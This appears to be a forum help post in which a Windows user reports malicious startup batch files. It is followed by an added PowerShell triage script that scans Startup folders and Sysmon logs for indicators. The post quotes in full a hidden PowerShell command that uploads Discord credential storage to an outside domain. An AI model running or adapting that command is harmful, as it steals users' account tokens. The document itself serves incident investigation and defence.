Upon turning on my personal Windows 10 computer tonight, I was greeted with ConEmu telling me that two PowerShell commands were run at startup. Both commands were the same thing:
powershell -windowstyle hidden -Command "& {&invoke-webrequest -method put -infile 'C:\Users\foo\AppData\Roaming\Discord\Local Storage\leveldb\000005.ldb' https://rip.rblx.dev/c/}"
The source of these commands is two batch files in C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp - LVTUSIX.bat and LVTUSIXd.bat. Both files were created this morning while I was away from my computer (about 30 min after turning it on). I'm unaware of a way to see who/what created the files - they are owned by the administrators group.
I can't find anything online about rip.rblx.dev or these batch files. A whois lookup on the domain reveals that all the info is privacy-protected.
I'm very suspicious as some research reveals that these .ldb files contain Discord user credentials.
Is anyone aware of what might be going on? Alternatively, does anyone have advice on how I might be able to find more info? I've since temporarily mangled the files to prevent them from running until I learn more. Thank you in advance.
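One way to gather the "more info" the post asks for, written here as an added triage script rather than anything from the original poster: it walks both Startup folders (the per-user one and the all-users one under C:\ProgramData that the post names), records creation time, owner and SHA-256 for every entry, and flags any script whose content matches the indicators visible in the post (hidden PowerShell, Invoke-WebRequest, the Discord leveldb path, the rip.rblx.dev domain). It then checks the Sysmon log for FileCreate events touching those folders, which is the only place the creating process would have been recorded; the assumption that Sysmon (or object-access auditing) was running at the time is exactly that, an assumption, and if neither was enabled the log query simply returns nothing.

```powershell
# Added triage script (not from the original post). Run from an elevated
# PowerShell prompt so the all-users Startup folder and event logs are readable.

# Both Startup locations; CommonStartup resolves to
# C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.
$startupDirs = @(
    [Environment]::GetFolderPath('Startup'),
    [Environment]::GetFolderPath('CommonStartup')
)

# Indicators taken from the post; regex, matched case-insensitively.
$patterns = @(
    'invoke-webrequest',
    '-windowstyle\s+hidden',
    'Local Storage\\leveldb',
    'rip\.rblx\.dev'
)

function Get-StartupTriage {
    foreach ($dir in $startupDirs) {
        if (-not (Test-Path -LiteralPath $dir)) { continue }
        Get-ChildItem -LiteralPath $dir -File -Force | ForEach-Object {
            $file    = $_
            $content = ''
            $hits    = @()

            if ($file.Extension -in '.bat', '.cmd', '.ps1', '.vbs', '.js') {
                # Script files: inspect the text directly.
                $content = Get-Content -LiteralPath $file.FullName -Raw -ErrorAction SilentlyContinue
            }
            elseif ($file.Extension -eq '.lnk') {
                # Shortcuts: inspect target and arguments, not the .lnk bytes.
                $shell   = New-Object -ComObject WScript.Shell
                $link    = $shell.CreateShortcut($file.FullName)
                $content = "$($link.TargetPath) $($link.Arguments)"
            }

            foreach ($p in $patterns) {
                if ($content -match $p) { $hits += $p }
            }

            [PSCustomObject]@{
                Path       = $file.FullName
                Created    = $file.CreationTime
                Modified   = $file.LastWriteTime
                Owner      = (Get-Acl -LiteralPath $file.FullName).Owner
                Sha256     = (Get-FileHash -LiteralPath $file.FullName -Algorithm SHA256).Hash
                Indicators = ($hits -join ', ')
            }
        }
    }
}

function Get-StartupFileCreateEvents {
    param([int]$Days = 2)
    $since = (Get-Date).AddDays(-$Days)
    # Sysmon Event ID 11 = FileCreate; the message names the creating Image and its PID.
    # Without Sysmon (or Security log 4663 via object-access auditing) there is no
    # built-in record of which process wrote a file.
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 11
        StartTime = $since
    } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Start Menu\\Programs\\StartUp' } |
        Select-Object TimeCreated, Message
}

Get-StartupTriage | Sort-Object Created -Descending | Format-Table -AutoSize
Get-StartupFileCreateEvents | Format-List
```

The hash column is there so the flagged files can be checked against a malware database before they are deleted, and the creation and modification times line up with the "about 30 min after turning it on" window in the post; any other persistence written in the same minute (Run keys, scheduled tasks) is worth a look with the same timestamps.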